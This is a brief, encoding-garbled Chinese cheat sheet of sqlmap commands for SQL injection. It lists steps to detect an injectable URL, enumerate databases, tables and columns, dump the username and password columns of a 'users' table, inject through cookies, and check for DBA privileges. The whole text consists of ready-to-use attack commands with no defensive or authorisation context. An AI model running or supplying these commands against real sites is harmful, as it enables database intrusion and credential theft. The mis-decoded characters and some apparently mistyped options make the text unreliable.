1殷勘、
【sqlmap -u? "url"】? ? ? -u:檢測是否存在注入,返回?cái)?shù)據(jù)庫的名字
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?--tables? 拆解所有表名
????????????????????????????????????????????????--data="例如: logil=1"
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? --columns :猜列名? ? ? ? ??
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? -T “users” :猜users表
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??-C “username,password” :猜列明
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?--dump:下載數(shù)據(jù)
????????1昔搂、 sqlmap -u "url"?
? ? ? ? 2玲销、?sqlmap -u "url" --tables
? ? ? ? 3、?sqlmap -u "url"??--columns? -T? “users”
? ? ? ? 4摘符、?sqlmap -u "url"???--dump??-C “username,password”???-T? “users”?
2贤斜、cookie注入
? ? 1、 sqlmap -u "url" --cookie "id=57" --level 2??
? ? 2逛裤、?sqlmap -u "url" --tables --cookie "id=57" --level 2??
3瘩绒、php
? ? 1、?sqlmap -u "url" --is-dba? ?:檢查是否有dba權(quán)限
????2别凹、sqlmap -u "url" --is-dbs? ? :列出所有數(shù)據(jù)庫
? ? 3草讶、sqlmap -u "url"? --current-db? ? :查找自己的數(shù)據(jù)庫
????4、sqlmap -u "url"? --tables -D"ggec"? ? :拆解ggec數(shù)據(jù)庫的所有表